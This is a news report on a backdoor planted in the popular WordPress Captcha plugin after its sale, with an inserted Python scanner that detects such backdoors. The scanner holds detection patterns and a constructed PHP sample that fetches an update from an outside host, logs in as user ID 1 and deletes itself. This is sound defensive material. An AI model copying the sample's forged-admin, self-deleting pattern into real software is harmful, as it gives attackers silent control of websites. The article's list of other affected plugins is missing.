A WordPress plugin installed on over 300,000 sites was recently modified to download and install a hidden backdoor. The WordPress team has intervened and removed this plugin from the official WordPress Plugins repository, also providing clean versions for affected customers.
Known only as Captcha, the plugin was one of the most popular CAPTCHA plugins on the official WordPress site and was the work of a well-established plugin developer named BestWebSoft, a company behind many other popular WordPress plugins.
BestWebSoft sold the free version of its Captcha plugin to a new developer named Simply WordPress on September 5, according to a blog post on the company's site.
Exactly three months after the sale, the plugin's new owner shipped Captcha version 4.3.7, which contained malicious code that would connect to the simplywordpress.net domain and download a plugin update package from outside the official WordPress repository (against WordPress.org rules). This sneaky update package would install a backdoor on sites using the plugin.
"This backdoor creates a session with user ID 1 (the default admin user that WordPress creates when you first install it), sets authentication cookies, and then deletes itself," says Matt Barry, Wordfence security researcher. "The backdoor installation code is unauthenticated, meaning anyone can trigger it."
Further, the update also contains code to trigger a clean update that removes all traces of the backdoor, should the attacker decide to erase his tracks.
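The behaviour described above gives a defender three concrete indicators to look for in a plugin's PHP source: an update package fetched from a host other than wordpress.org, a session created for user ID 1 without any login, and a file that unlinks itself after running. The following heuristic scanner is an added example written for this page; it is not Wordfence's or WordPress.org's tooling, and the two PHP samples it scans are constructed fixtures, not the actual Captcha plugin code. The WordPress function names it matches (`download_url`, `wp_remote_get`, `wp_set_current_user`, `wp_set_auth_cookie`, the `pre_set_site_transient_update_plugins` filter) are real APIs; the `.test` domain and the `cp_` function names in the fixture are invented.

```python
"""Heuristic scan of PHP plugin source for the backdoor indicators described above."""
import os
import re
from dataclasses import dataclass
from typing import List

# Hosts a plugin may legitimately contact for updates and metadata.
WP_HOSTS = ("wordpress.org", "downloads.wordpress.org", "api.wordpress.org")

# (rule id, pattern, description). The first rule captures the URL host so
# that requests to wordpress.org itself can be whitelisted in scan_php().
RULES = [
    ("external_update_source",
     re.compile(r"""(?:download_url|wp_remote_get|wp_remote_post)\s*\(\s*['"](https?://[^'"/]+)""", re.I),
     "update/download request to a host outside wordpress.org"),
    ("update_transient_override",
     re.compile(r"pre_set_site_transient_update_plugins"),
     "plugin overrides WordPress's own update check"),
    ("admin_session_forged",
     re.compile(r"wp_set_current_user\s*\(\s*1\s*\)|wp_set_auth_cookie\s*\(\s*1\s*[,)]"),
     "session created for user ID 1 without a login"),
    ("self_delete",
     re.compile(r"unlink\s*\(\s*__FILE__\s*\)"),
     "file deletes itself after executing"),
]


@dataclass
class Finding:
    rule: str
    line: int
    detail: str


def _is_wordpress_host(url: str) -> bool:
    host = url.split("://", 1)[1].lower()
    return any(host == h or host.endswith("." + h) for h in WP_HOSTS)


def scan_php(source: str) -> List[Finding]:
    """Return one Finding per (line, rule) hit in the given PHP source."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for rule_id, pattern, description in RULES:
            match = pattern.search(line)
            if not match:
                continue
            # Fetching from wordpress.org is normal; only flag other hosts.
            if rule_id == "external_update_source" and _is_wordpress_host(match.group(1)):
                continue
            findings.append(Finding(rule_id, lineno, description))
    return findings


def verdict(findings: List[Finding]) -> str:
    """Forged admin session plus any second indicator is treated as a likely backdoor."""
    rules = {f.rule for f in findings}
    if "admin_session_forged" in rules and len(rules) >= 2:
        return "likely backdoor"
    return "review" if rules else "clean"


def scan_directory(root: str) -> dict:
    """Scan every .php file under root (e.g. wp-content/plugins); returns {path: verdict}."""
    results = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    results[path] = verdict(scan_php(fh.read()))
    return results


# Constructed fixture (not the real plugin): an update routine that pulls a
# package from an arbitrary domain, then an installer that logs in as user 1
# and removes itself.
SUSPECT_PLUGIN = """<?php
add_filter('pre_set_site_transient_update_plugins', 'cp_inject_update');
function cp_inject_update($transient) {
    $pkg = download_url('https://updates.example-plugin-host.test/captcha.zip');
    return $transient;
}
function cp_install() {
    wp_set_current_user(1);
    wp_set_auth_cookie(1);
    @unlink(__FILE__);
}
"""

# Constructed benign fixture: talks only to api.wordpress.org and sets the
# current user only from an existing login.
BENIGN_PLUGIN = """<?php
$info = wp_remote_get('https://api.wordpress.org/plugins/info/1.0/captcha.json');
if (is_user_logged_in()) {
    wp_set_current_user(get_current_user_id());
}
"""

if __name__ == "__main__":
    for label, src in (("suspect", SUSPECT_PLUGIN), ("benign", BENIGN_PLUGIN)):
        hits = scan_php(src)
        print(f"{label}: {verdict(hits)}")
        for f in hits:
            print(f"  line {f.line}: {f.rule} - {f.detail}")
```

Run it against a site's `wp-content/plugins` directory with `scan_directory()`; a "likely backdoor" verdict is a prompt for manual review of that file, not proof on its own, since legitimate installers occasionally call `wp_set_current_user` or host updates off-site. The point of combining indicators is exactly the pattern in the article: off-repository update source plus silent admin session plus self-deletion.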
Initially, the update didn't catch anyone's eye, and it would likely have continued to fly under the radar to this day.
What exposed the backdoor was not a user complaint but a copyright claim from the WordPress team. A few days ago, the WordPress team removed the Captcha plugin from the official WordPress.org website because the plugin's new author had used the "WordPress" trademark in his name and plugin branding.
The plugin's removal from the WordPress site alerted the security team at Wordfence, a company that provides a powerful Web Application Firewall (WAF) for WordPress sites.
"Whenever the WordPress repository removes a plugin with a large user base, we check to see if it was possibly due to something security-related," Barry says, explaining how they came to review the plugin's code and spot the backdoor.
Once they spotted the backdoor, Wordfence notified the WordPress security team, who then put together a clean version of the Captcha plugin (version 4.4.5), which they immediately started to force-install on all affected websites, removing backdoored versions from users' sites. Over 100,000 sites received the clean version of the Captcha plugin over the weekend, the WordPress team said.
Since first coming across the backdoor, the Wordfence team has spent its time digging into the dealings of the Simply WordPress company.
Experts say they've discovered backdoored update packages on the simplywordpress.net domain for other WordPress plugins such as:
None of these names appear to correspond to plugins hosted on the official WordPress repository.
Nonetheless, clues in the simplywordpress.net domain have put the Wordfence team on the trail of a known abuser they have met and exposed in the past.
According to Barry, the Simply WordPress company appears to be connected to Mason Soiza, an individual they have previously linked to backdoors in the Display Widgets (200,000+ installs) and 404 to 301 (70,000 installs) plugins.
Wordfence claims Soiza has been buying WordPress plugins and adding backdoor code to each one. Soiza is allegedly using the backdoored versions to insert hidden backlinks to spammy domains, including for Payday Loans, a company he owns. The entire purpose of this business is to help Soiza's sites rank better in search results.